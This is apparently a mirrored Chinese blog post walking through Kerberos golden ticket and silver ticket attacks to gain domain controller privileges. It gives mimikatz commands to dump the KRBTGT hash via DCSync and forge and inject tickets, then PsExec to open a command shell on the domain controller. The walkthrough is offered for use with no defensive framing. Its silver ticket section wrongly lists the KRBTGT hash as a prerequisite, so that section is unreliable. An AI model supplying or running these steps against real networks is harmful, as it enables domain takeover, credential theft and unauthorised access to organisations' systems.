zoukankan      html  css  js  c++  java
  • 黄金票据和白银票据获取域控权限

    黄金票据

    前提条件

    1. 域名称
    2. 域的SID值
    3. 域的KRBTGT账户的 Hash NTLM
    4. 伪造的用户名(这里是 administrator ),可以是任意用户甚至是不存在的用户

    利用

    mimikatz的下载地址:https://github.com/gentilkiwi/mimikatz
    PsExec的下载地址:https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

    ipconfig /all    #获取域名(前提条件1)
    
    whoami /all    #获取域SID值(前提条件2)
    
    lsadump::dcsync /domain: /*域名*/  /user:krbtgt    #获取KRBTGT账户的 Hash NTLM(前提条件3)
    
    klist purge    #删除票证
    
    kerberos::golden /admin:administrator /domain: /*域名*/  /sid: /*SID*/  /krbtgt: /*Hash NTLM*/ /ptt    #伪造票据(前提条件4)
    
    dir \abc.test.comc$    #查看域控的C盘目录(abc.test.com为域控全名)
    
    PsExec.exe \abc.test.com cmd    #使用PsExec获取一个cmdshell
    

    白银票据

    前提条件

    1. 域名称
    2. 域的SID值
    3. 域的KRBTGT账户的 Hash NTLM
    4. 伪造的用户名(这里是 test ),可以是任意用户甚至是不存在的用户

    利用

    伪造票据命令如下:

    kerberos::golden /domain: /*域名*/ /sid: /*SID值*/ /target: /*域控全名*/ /service:cifs /rc4:/*Hash NTLM*/ /user:test /ptt
    
  • 相关阅读:
    切换node版本
    vue 移动端组件
    vue 单元测试
    git
    每日日报
    每日日报
    每日日报
    01人月神话阅读笔记之三
    每日日报
    每日日报
  • 原文地址:https://www.cnblogs.com/riyir/p/12640203.html
Copyright © 2011-2022 走看看